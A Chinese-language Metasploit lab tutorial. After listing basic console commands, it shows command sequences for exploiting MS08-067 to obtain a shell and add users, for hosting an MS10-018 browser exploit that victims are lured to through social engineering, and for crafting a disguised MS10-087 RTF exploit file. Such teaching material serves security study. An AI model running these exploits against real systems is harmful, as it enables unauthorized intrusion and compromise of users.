一、基本概念和简单命令
概念:MSF是一款开源的漏洞利用框架,可以用于漏洞利用、payload生成与执行、漏洞研究等。
原理:其核心是一个框架,提供了一个统一的接口和环境,用于管理和执行各种漏洞利用模块和Payload。框架通过加载不同模块来实现不同的功能,每个模块都有特定的用途和参数。在进行渗透测试时,用户首先需要选择合适的漏洞利用模块,并根据目标系统的情况配置相应的参数,然后选择要执行的payload。框架会将漏洞利用模块和payload组合起来,生成一个可执行的攻击脚本,通过网络发送到目标系统,尝试利用目标系统的漏洞来执行payload,从而达到攻击目标的目的。
Kali本身带MSF,不用另外下载安装。
简单命令:
msfconsole //进入MSF控制台
?search //帮助
search ms08_067 //搜索漏洞模块
exploit/windows/smb/ms08_067_netapi //使用该模块
back //从当前环境返回
connect www.baidu.com 80 //连接(换成其他的)
info exploit/windows/smb/ms08_067_netapi //显示该漏洞模块的信息
jobs //显示和管理作业(跟Windows任务管理器的进程作用一样)
quit //退出
exit //退出
二、实际操作模拟实验
1.靶机攻击渗透(MS08_067)
简单思路:准备两个系统,一个当受害机,一个当攻击机,使用ifconfig查询受害机的IP,在攻击机上进入MSF工具,使用漏洞模块,使用RHOST设置要攻击对象的IP,运行后可以使用shell命令。
msfconsole //进入MSF控制台
use exploit/windows/smb/ms08_067_netapi //ms08_067已经是一个很老的漏洞了,可以拿来做实验
show options ///查看参数
set RHOST 192.168.233.3 //设置要攻击的主机的IP或IP范围 RHOST即设置攻击对象
run //运行
shell //进行shell命令
net user //查看用户
net user test test /add //添加用户test
net user
net user test /del //删除用户
2.浏览器攻击渗透(MS10_018)
简单思路:攻击机生成伪造网址,让受害机进行访问。
msfconsole
use exploit/windows/browser/ms10_018_ie_behaviors
set SRVHOST 192.168.233.3 //攻击机自己的IP
set LPORT 4441 //设置端口
exploit -j
//生成网址后,通过社工手段让受害机执行
jobs
sessions //连接会话
sessions -i 2
shell
使用exploit -j生成网址后,让靶机通过刚才创建的新用户进入系统(如果是管理者身份容易出错),并且浏览器直接访问该网址。(如箭头所指)
靶机开始访问后,攻击机这边就会有相应显示,在使用sessions显示出会话几后,通过sessions -i (number)进入会话,前面显示会话几就写几,通过shell就可以键入命令了。
3.应用软件格式渗透(MS10_087)
简单思路:使用攻击机生成可执行文件,复制到靶机上,靶机运行。
记得在攻击机执行命令要用root身份,使用sudo即可切换。
msfconsole
use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof //使用漏洞模块
set payload windows/exec
set CMD calc.exe //生成可执行文件,这里用计算器代替
set FILENAME ceshi.rtf //设置文件名,将可执行文件包装成word形式
run
看最后一行,文件在root目录下,.msf4是隐藏文件,需要打开隐藏文件视图(show hidden files),把文件复制到靶机上运行即可。